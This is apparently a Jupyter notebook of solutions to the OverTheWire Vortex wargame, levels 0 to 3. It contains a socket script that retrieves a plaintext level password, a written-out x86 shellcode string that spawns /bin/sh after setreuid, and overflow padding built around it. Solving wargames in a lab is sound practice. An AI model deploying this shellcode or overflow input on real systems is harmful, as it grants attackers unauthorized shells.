# Vortex Level 0 → Level 1 <br/>

https://overthewire.org/wargames/vortex/vortex0.html


In [1]:
import socket
import struct

HOST = "vortex.labs.overthewire.org"
PORT = 5842

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))

    result = 0
    for i in range(0, 4):
        data = s.recv(4)
        print(data)
        result += int.from_bytes(data, "little")
        # s.sendall(data)

    s.sendall(struct.pack("<I", result))
    data = s.recv(1024)
    print(data)

b'\xad\xad\xf6\x15'
b'+\xa9\xe8='
b'\x02\xc8\xb7b'
b'HI\x05\x00'
b'Username: vortex1 Password: Gq#qu3bF3'


# Vortex Level 1 → Level 2


In [24]:
0xFFFFFFFF - 0xCAFFFFFF

889192448

# Vortex Level 2 → Level 3


In [1]:
len(
    b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
)

34

# Vortex Level 3 → Level 4


In [2]:
len(
    b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
    + b"A" * 98
)

132